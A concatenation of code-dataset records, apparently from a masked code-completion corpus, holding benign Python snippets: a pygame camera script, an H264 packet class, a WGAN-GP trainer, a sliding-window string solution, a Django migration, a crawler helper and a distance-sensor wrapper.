# max_height = max(heights)
# new_im = Image.new('RGB', (total_width, max_height))
# x_offset = 0
# for im in images:
# new_im.paste(im, (x_offset,0))
# x_offset += im.size[0]
# new_im.save('test.jpg')
|
normal
|
{
"blob_id": "aae280e049c00e70e2214662a07eee8bfa29227e",
"index": 6632,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npygame.init()\npygame.camera.init()\n<mask token>\nprint(camlist)\n",
"step-3": "<mask token>\npygame.init()\npygame.camera.init()\ncamlist = pygame.camera.list_cameras()\nprint(camlist)\n",
"step-4": "import sys\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\nfrom PIL import Image\npygame.init()\npygame.camera.init()\ncamlist = pygame.camera.list_cameras()\nprint(camlist)\n",
"step-5": "import sys\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\nfrom PIL import Image\n\n\npygame.init()\npygame.camera.init()\n\ncamlist = pygame.camera.list_cameras()\n\nprint(camlist)\n\n# images = map(Image.open, ['Test1.jpg', 'Test2.jpg', 'Test3.jpg'])\n# widths, heights = zip(*(i.size for i in images))\n\n# total_width = sum(widths)\n# max_height = max(heights)\n\n# new_im = Image.new('RGB', (total_width, max_height))\n\n# x_offset = 0\n# for im in images:\n# new_im.paste(im, (x_offset,0))\n# x_offset += im.size[0]\n\n# new_im.save('test.jpg')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import struct
class H264Packet:
UNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)
def __init__(self, packet):
self.packet = packet
self.type = None
self.data = None
if len(packet) > 3:
(self.type,) = struct.unpack('H', packet[0:2])
self.data = packet[2:]
def serialize(self):
return self.packet
def type(self):
return self.type
def data(self):
return self.data
|
normal
|
{
"blob_id": "ff1db5981a0163df1dfb44869a3d4af2be03c10a",
"index": 2745,
"step-1": "<mask token>\n\n\nclass H264Packet:\n <mask token>\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n <mask token>\n\n def data(self):\n return self.data\n",
"step-2": "<mask token>\n\n\nclass H264Packet:\n <mask token>\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n\n def type(self):\n return self.type\n\n def data(self):\n return self.data\n",
"step-3": "<mask token>\n\n\nclass H264Packet:\n UNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n\n def type(self):\n return self.type\n\n def data(self):\n return self.data\n",
"step-4": "import struct\n\n\nclass H264Packet:\n UNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)\n\n def __init__(self, packet):\n self.packet = packet\n self.type = None\n self.data = None\n if len(packet) > 3:\n self.type, = struct.unpack('H', packet[0:2])\n self.data = packet[2:]\n\n def serialize(self):\n return self.packet\n\n def type(self):\n return self.type\n\n def data(self):\n return self.data\n",
"step-5": "import struct\n\n\nclass H264Packet:\n\tUNKNOWN_TYPE, I_HDR, P_HDR, B_HDR, I_DATA, P_DATA, B_DATA = range(7)\n\n\tdef __init__(self, packet):\n\t\tself.packet = packet\n\t\tself.type = None\n\t\tself.data = None\n\t\tif len(packet) > 3:\n\t\t\t(self.type,) = struct.unpack('H', packet[0:2])\n\t\t\tself.data = packet[2:]\n\t\n\tdef serialize(self):\n\t\treturn self.packet \n\t\t\n\tdef type(self):\n\t\treturn self.type\n\t\n\tdef data(self):\n\t\treturn self.data",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/python3
#https://github.com/pfnet-research/chainer-gan-lib/blob/master/wgan_gp/updater.py
import numpy as np
import chainer
import chainer.functions as F
from chainer import Variable
from chainer.dataset import convert
class WGANUpdater(chainer.training.updaters.StandardUpdater):
def __init__(self, *args, **kwargs):
self.gen, self.dis = kwargs.pop('models')
self.n_dis = kwargs.pop('n_dis')
self.lam = kwargs.pop('lam')
self.iteration = 0
super(WGANUpdater, self).__init__(*args, **kwargs)
def loss_gen(self, gen, y_fake):
batchsize = len(y_fake)
loss = F.sum(-y_fake)/batchsize
chainer.reporter.report({'loss': loss}, gen)
return loss
def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):
batchsize = len(y_fake)
xp = dis.xp
eps = xp.random.uniform(0, 1, size=batchsize)\
.astype("f")[:, None, None, None]
x_mid = eps * x_real + (1.0 - eps) * x_fake
y_mid,_ = self.dis(x_mid)
grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)
grad = F.sqrt(F.batch_l2_norm_squared(grad))
loss_grad = self.lam * F.mean_squared_error(grad,
xp.ones_like(grad.data))
loss = F.sum(-y_real) / batchsize
loss += F.sum(y_fake) / batchsize
wasserstein_distance = -loss
loss += loss_grad
chainer.reporter.report({'wasserstein_distance': wasserstein_distance,
'loss_grad':loss_grad})
chainer.reporter.report({'loss': loss}, dis)
return loss
def update_core(self):
gen_optimizer = self.get_optimizer('gen')
dis_optimizer = self.get_optimizer('dis')
xp = self.gen.xp
for i in range(self.n_dis):
batch = self.get_iterator('main').next()
batchsize = len(batch)
x = []
for j in range(batchsize):
x.append(np.asarray(batch[j]).astype("f"))
x_real = Variable(xp.asarray(x))
y_real,_ = self.dis(x_real)
z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))
x_fake = self.gen(z)
y_fake,_ = self.dis(x_fake)
if i == 0:
gen_optimizer.update(self.loss_gen, self.gen, y_fake)
x_fake.unchain_backward()
dis_optimizer.update(self.loss_dis, self.dis,
y_real, y_fake, x_real, x_fake)
|
normal
|
{
"blob_id": "a7099b2506de08893ca849146813505d88784895",
"index": 2402,
"step-1": "<mask token>\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n eps = xp.random.uniform(0, 1, size=batchsize).astype('f')[:, None,\n None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n y_mid, _ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, xp.ones_like(grad\n .data))\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance':\n wasserstein_distance, 'loss_grad': loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n eps = xp.random.uniform(0, 1, size=batchsize).astype('f')[:, None,\n None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n y_mid, _ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, xp.ones_like(grad\n .data))\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance':\n wasserstein_distance, 'loss_grad': loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n xp = self.gen.xp\n for i in range(self.n_dis):\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n x = []\n for j in range(batchsize):\n x.append(np.asarray(batch[j]).astype('f'))\n x_real = Variable(xp.asarray(x))\n y_real, _ = self.dis(x_real)\n z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))\n x_fake = self.gen(z)\n y_fake, _ = self.dis(x_fake)\n if i == 0:\n gen_optimizer.update(self.loss_gen, self.gen, y_fake)\n x_fake.unchain_backward()\n dis_optimizer.update(self.loss_dis, self.dis, y_real, y_fake,\n x_real, x_fake)\n",
"step-4": "import numpy as np\nimport chainer\nimport chainer.functions as F\nfrom chainer import Variable\nfrom chainer.dataset import convert\n\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake) / batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n eps = xp.random.uniform(0, 1, size=batchsize).astype('f')[:, None,\n None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n y_mid, _ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, xp.ones_like(grad\n .data))\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance':\n wasserstein_distance, 'loss_grad': loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n xp = self.gen.xp\n for i in range(self.n_dis):\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n x = []\n for j in range(batchsize):\n x.append(np.asarray(batch[j]).astype('f'))\n x_real = Variable(xp.asarray(x))\n y_real, _ = self.dis(x_real)\n z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))\n x_fake = self.gen(z)\n y_fake, _ = self.dis(x_fake)\n if i == 0:\n gen_optimizer.update(self.loss_gen, self.gen, y_fake)\n x_fake.unchain_backward()\n dis_optimizer.update(self.loss_dis, self.dis, y_real, y_fake,\n 
x_real, x_fake)\n",
"step-5": "#!/usr/bin/python3\n#https://github.com/pfnet-research/chainer-gan-lib/blob/master/wgan_gp/updater.py\n\nimport numpy as np\nimport chainer\nimport chainer.functions as F\nfrom chainer import Variable\nfrom chainer.dataset import convert\n\nclass WGANUpdater(chainer.training.updaters.StandardUpdater):\n\n def __init__(self, *args, **kwargs):\n self.gen, self.dis = kwargs.pop('models')\n self.n_dis = kwargs.pop('n_dis')\n self.lam = kwargs.pop('lam')\n self.iteration = 0\n super(WGANUpdater, self).__init__(*args, **kwargs)\n\n def loss_gen(self, gen, y_fake):\n batchsize = len(y_fake)\n loss = F.sum(-y_fake)/batchsize\n chainer.reporter.report({'loss': loss}, gen)\n return loss\n def loss_dis(self, dis, y_real, y_fake, x_real, x_fake):\n batchsize = len(y_fake)\n xp = dis.xp\n\n eps = xp.random.uniform(0, 1, size=batchsize)\\\n .astype(\"f\")[:, None, None, None]\n x_mid = eps * x_real + (1.0 - eps) * x_fake\n\n y_mid,_ = self.dis(x_mid)\n grad, = chainer.grad([y_mid], [x_mid], enable_double_backprop=True)\n grad = F.sqrt(F.batch_l2_norm_squared(grad))\n loss_grad = self.lam * F.mean_squared_error(grad, \n xp.ones_like(grad.data))\n\n loss = F.sum(-y_real) / batchsize\n loss += F.sum(y_fake) / batchsize\n wasserstein_distance = -loss\n loss += loss_grad\n chainer.reporter.report({'wasserstein_distance': wasserstein_distance,\n 'loss_grad':loss_grad})\n chainer.reporter.report({'loss': loss}, dis)\n return loss\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n xp = self.gen.xp\n\n for i in range(self.n_dis):\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n x = []\n for j in range(batchsize):\n x.append(np.asarray(batch[j]).astype(\"f\"))\n x_real = Variable(xp.asarray(x))\n y_real,_ = self.dis(x_real)\n\n z = Variable(xp.asarray(self.gen.make_hidden(batchsize)))\n x_fake = self.gen(z)\n y_fake,_ = self.dis(x_fake)\n\n if i == 0:\n gen_optimizer.update(self.loss_gen, 
self.gen, y_fake)\n x_fake.unchain_backward()\n\n dis_optimizer.update(self.loss_dis, self.dis, \n y_real, y_fake, x_real, x_fake)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def minWindow(self, s: str, t: str) ->str:
char_cnt = {}
for character in t:
if character not in char_cnt:
char_cnt[character] = 1
else:
char_cnt[character] += 1
dq = []
min_substring = None
for i in range(len(s)):
if s[i] in t:
char_cnt[s[i]] -= 1
dq.append((i, s[i]))
while len(dq) > 0 and char_cnt[dq[0][1]] < 0:
char_cnt[dq[0][1]] += 1
del dq[0]
containAll = True
for char in char_cnt:
if char_cnt[char] > 0:
containAll = False
break
if containAll:
substring = s[dq[0][0]:dq[-1][0] + 1]
if min_substring is None or len(substring) < len(
min_substring):
min_substring = substring
return min_substring if min_substring else ''
<|reserved_special_token_1|>
class Solution:
def minWindow(self, s: str, t: str) -> str:
char_cnt = {}
for character in t:
if character not in char_cnt:
char_cnt[character] = 1
else:
char_cnt[character] += 1
dq = [] # add index & character
min_substring = None
for i in range(len(s)):
if s[i] in t:
char_cnt[s[i]] -= 1
dq.append((i, s[i]))
while len(dq) > 0 and char_cnt[dq[0][1]] < 0:
char_cnt[dq[0][1]] += 1
del dq[0]
containAll = True
for char in char_cnt:
if char_cnt[char] > 0:
containAll = False
break
if containAll:
substring = s[dq[0][0]:dq[-1][0]+1]
if min_substring is None or len(substring) < len(min_substring):
min_substring = substring
return min_substring if min_substring else ""
|
flexible
|
{
"blob_id": "22706d7d9c04bb660c9bf0df66de89ed6bd480c2",
"index": 8210,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def minWindow(self, s: str, t: str) ->str:\n char_cnt = {}\n for character in t:\n if character not in char_cnt:\n char_cnt[character] = 1\n else:\n char_cnt[character] += 1\n dq = []\n min_substring = None\n for i in range(len(s)):\n if s[i] in t:\n char_cnt[s[i]] -= 1\n dq.append((i, s[i]))\n while len(dq) > 0 and char_cnt[dq[0][1]] < 0:\n char_cnt[dq[0][1]] += 1\n del dq[0]\n containAll = True\n for char in char_cnt:\n if char_cnt[char] > 0:\n containAll = False\n break\n if containAll:\n substring = s[dq[0][0]:dq[-1][0] + 1]\n if min_substring is None or len(substring) < len(\n min_substring):\n min_substring = substring\n return min_substring if min_substring else ''\n",
"step-4": "class Solution:\n def minWindow(self, s: str, t: str) -> str:\n char_cnt = {}\n for character in t:\n if character not in char_cnt:\n char_cnt[character] = 1\n else:\n char_cnt[character] += 1\n\n dq = [] # add index & character\n min_substring = None\n for i in range(len(s)):\n if s[i] in t:\n char_cnt[s[i]] -= 1\n dq.append((i, s[i]))\n while len(dq) > 0 and char_cnt[dq[0][1]] < 0:\n char_cnt[dq[0][1]] += 1\n del dq[0]\n containAll = True\n for char in char_cnt:\n if char_cnt[char] > 0:\n containAll = False\n break\n if containAll:\n substring = s[dq[0][0]:dq[-1][0]+1]\n if min_substring is None or len(substring) < len(min_substring):\n min_substring = substring\n return min_substring if min_substring else \"\"\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Условие
Дано два числа a и b. Выведите гипотенузу треугольника с заданными катетами.
'''
import math
a = int(input())
b = int(input())
print(math.sqrt(a * a + b * b))
|
normal
|
{
"blob_id": "c0348fc5f51e6f7a191fea6d0e3cb84c60b03e22",
"index": 597,
"step-1": "'''\nУсловие\nДано два числа a и b. Выведите гипотенузу треугольника с заданными катетами.\n'''\nimport math\na = int(input())\nb = int(input())\nprint(math.sqrt(a * a + b * b))",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Generated by Django 3.2.3 on 2021-05-29 16:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('login', '0014_auto_20210529_1637'),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('street', models.CharField(blank=True, max_length=255, null=True)),
('postal_code', models.IntegerField(blank=True, null=True)),
('city', models.CharField(blank=True, max_length=255, null=True)),
('country', models.CharField(blank=True, max_length=255, null=True)),
('facility', models.CharField(blank=True, max_length=255, null=True)),
],
),
migrations.CreateModel(
name='StudySession',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_active', models.BooleanField(default=True)),
('start_time', models.TimeField()),
('end_time', models.TimeField()),
('date', models.DateField()),
('available_spots', models.IntegerField(default=1)),
('taken_spots', models.IntegerField(default=0)),
('description', models.CharField(blank=True, max_length=500, null=True)),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.location')),
('subject', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='login.subject')),
],
),
migrations.CreateModel(
name='Participant',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('study_session', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.studysession')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
normal
|
{
"blob_id": "6285d1665bacbff746f44f42ce65981f937fff64",
"index": 4189,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('login', '0014_auto_20210529_1637')]\n operations = [migrations.CreateModel(name='Location', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('street', models.CharField(blank=True,\n max_length=255, null=True)), ('postal_code', models.IntegerField(\n blank=True, null=True)), ('city', models.CharField(blank=True,\n max_length=255, null=True)), ('country', models.CharField(blank=\n True, max_length=255, null=True)), ('facility', models.CharField(\n blank=True, max_length=255, null=True))]), migrations.CreateModel(\n name='StudySession', fields=[('id', models.BigAutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('is_active', models.BooleanField(default=True)), (\n 'start_time', models.TimeField()), ('end_time', models.TimeField()),\n ('date', models.DateField()), ('available_spots', models.\n IntegerField(default=1)), ('taken_spots', models.IntegerField(\n default=0)), ('description', models.CharField(blank=True,\n max_length=500, null=True)), ('location', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to=\n 'study_sessions.location')), ('subject', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='login.subject'))]),\n migrations.CreateModel(name='Participant', fields=[('id', models.\n BigAutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('study_session', models.ForeignKey(on_delete=\n django.db.models.deletion.CASCADE, to='study_sessions.studysession'\n )), ('user', models.ForeignKey(on_delete=django.db.models.deletion.\n CASCADE, to=settings.AUTH_USER_MODEL))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('login', '0014_auto_20210529_1637')]\n operations = [migrations.CreateModel(name='Location', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('street', models.CharField(blank=True,\n max_length=255, null=True)), ('postal_code', models.IntegerField(\n blank=True, null=True)), ('city', models.CharField(blank=True,\n max_length=255, null=True)), ('country', models.CharField(blank=\n True, max_length=255, null=True)), ('facility', models.CharField(\n blank=True, max_length=255, null=True))]), migrations.CreateModel(\n name='StudySession', fields=[('id', models.BigAutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('is_active', models.BooleanField(default=True)), (\n 'start_time', models.TimeField()), ('end_time', models.TimeField()),\n ('date', models.DateField()), ('available_spots', models.\n IntegerField(default=1)), ('taken_spots', models.IntegerField(\n default=0)), ('description', models.CharField(blank=True,\n max_length=500, null=True)), ('location', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to=\n 'study_sessions.location')), ('subject', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='login.subject'))]),\n migrations.CreateModel(name='Participant', fields=[('id', models.\n BigAutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('study_session', models.ForeignKey(on_delete=\n django.db.models.deletion.CASCADE, to='study_sessions.studysession'\n )), ('user', models.ForeignKey(on_delete=django.db.models.deletion.\n CASCADE, to=settings.AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 3.2.3 on 2021-05-29 16:37\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('login', '0014_auto_20210529_1637'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('street', models.CharField(blank=True, max_length=255, null=True)),\n ('postal_code', models.IntegerField(blank=True, null=True)),\n ('city', models.CharField(blank=True, max_length=255, null=True)),\n ('country', models.CharField(blank=True, max_length=255, null=True)),\n ('facility', models.CharField(blank=True, max_length=255, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='StudySession',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('is_active', models.BooleanField(default=True)),\n ('start_time', models.TimeField()),\n ('end_time', models.TimeField()),\n ('date', models.DateField()),\n ('available_spots', models.IntegerField(default=1)),\n ('taken_spots', models.IntegerField(default=0)),\n ('description', models.CharField(blank=True, max_length=500, null=True)),\n ('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.location')),\n ('subject', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='login.subject')),\n ],\n ),\n migrations.CreateModel(\n name='Participant',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('study_session', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.studysession')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, 
to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from allcode.controllers.image_classifiers.image_classifier import ImageClassifier
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog',
'final_prob': .8}
|
normal
|
{
"blob_id": "71fb9dc9f9ac8b1cdbc6af8a859dbc211512b4d1",
"index": 1675,
"step-1": "<mask token>\n\n\nclass ImageClassifierMockup(ImageClassifier):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageClassifierMockup(ImageClassifier):\n <mask token>\n\n def classify_image(self, image):\n return {'final_class': 'dog', 'final_prob': 0.8}\n",
"step-3": "<mask token>\n\n\nclass ImageClassifierMockup(ImageClassifier):\n\n def classify_images(self, images):\n pass\n\n def classify_image(self, image):\n return {'final_class': 'dog', 'final_prob': 0.8}\n",
"step-4": "from allcode.controllers.image_classifiers.image_classifier import ImageClassifier\n\n\nclass ImageClassifierMockup(ImageClassifier):\n\n def classify_images(self, images):\n pass\n\n def classify_image(self, image):\n return {'final_class': 'dog', 'final_prob': 0.8}\n",
"step-5": "from allcode.controllers.image_classifiers.image_classifier import ImageClassifier\n\n\nclass ImageClassifierMockup(ImageClassifier):\n\n def classify_images(self, images):\n pass\n\n def classify_image(self, image):\n return {'final_class': 'dog',\n 'final_prob': .8}\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
my_order = ['spam', 'eggs', 'sausage', 'spam', 'bacon', 'spam']
while 'spam' in my_order:
print("I don't like spam!")
my_order.remove('spam')
print(my_order)
|
normal
|
{
"blob_id": "8e8629dd2d4bb601347694b18d7cb6a94880201d",
"index": 8192,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile 'spam' in my_order:\n print(\"I don't like spam!\")\n my_order.remove('spam')\nprint(my_order)\n",
"step-3": "my_order = ['spam', 'eggs', 'sausage', 'spam', 'bacon', 'spam']\nwhile 'spam' in my_order:\n print(\"I don't like spam!\")\n my_order.remove('spam')\nprint(my_order)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
__author__ = 'changwoncheo'
# -*- coding: utf-8 -*-
import threading
import logging
logging.basicConfig(filename='crawl2.log',level=logging.DEBUG)
class NoParsingFilter(logging.Filter):
def filter(self, record):
msg = record.getMessage()
return not ('Starting' in msg or 'GET' in msg)
logger = logging.getLogger('Crawler')
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.CRITICAL) #로깅 되지 않도록
import os
import re
reobj_album = re.compile('\'(.*)\'')#앨범 정규식 (javascript('숫자'))
reobj_djIndex = re.compile(',\'(.*)\'')#앨범 정규식 (javascript('숫자','숫자'))
reobj_filename = re.compile('/(\w*[.]\w*)$')#파일이름 정규식
category = {102:'발라드',103:'댄스',104:'랩_합합',105:'R&B_Soul',106:'록',107:'일렉트로니카',108:'트로트',109:'포크',110:'인디음악'}
def tapNewlineStrip(str):
return str.encode('utf-8').replace('\n','').replace('\t','').decode('utf-8')
def writeJson(fileName,dict):
import json
print dict
with open(fileName, 'w') as outfile:
json.dump(dict, outfile, ensure_ascii = False, encoding = 'utf-8')
|
normal
|
{
"blob_id": "a52f009a755b45f8ed653a4a0385b1eb667f2318",
"index": 9797,
"step-1": "__author__ = 'changwoncheo'\n# -*- coding: utf-8 -*-\nimport threading\nimport logging\nlogging.basicConfig(filename='crawl2.log',level=logging.DEBUG)\nclass NoParsingFilter(logging.Filter):\n def filter(self, record):\n msg = record.getMessage()\n return not ('Starting' in msg or 'GET' in msg)\nlogger = logging.getLogger('Crawler')\nrequests_log = logging.getLogger(\"requests\")\nrequests_log.setLevel(logging.CRITICAL) #로깅 되지 않도록\n\n\nimport os\nimport re\nreobj_album = re.compile('\\'(.*)\\'')#앨범 정규식 (javascript('숫자'))\nreobj_djIndex = re.compile(',\\'(.*)\\'')#앨범 정규식 (javascript('숫자','숫자'))\nreobj_filename = re.compile('/(\\w*[.]\\w*)$')#파일이름 정규식\ncategory = {102:'발라드',103:'댄스',104:'랩_합합',105:'R&B_Soul',106:'록',107:'일렉트로니카',108:'트로트',109:'포크',110:'인디음악'}\ndef tapNewlineStrip(str):\n return str.encode('utf-8').replace('\\n','').replace('\\t','').decode('utf-8')\n\ndef writeJson(fileName,dict):\n import json\n print dict\n with open(fileName, 'w') as outfile:\n json.dump(dict, outfile, ensure_ascii = False, encoding = 'utf-8')\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import VL53L1X
from sensor_msgs.msg import Range
class _VL53L1():
    """Wrapper around a VL53L1X time-of-flight distance sensor.

    Readings are returned as sensor_msgs Range messages.
    """

    def __init__(self, address=0x29):
        """Open the sensor on I2C bus 1 and start continuous ranging.

        Accepts the I2C address as either an int (e.g. 0x29, the default)
        or a hex string (e.g. "0x29"). The original code unconditionally
        called int(address, 16), which raises TypeError for the int default.
        """
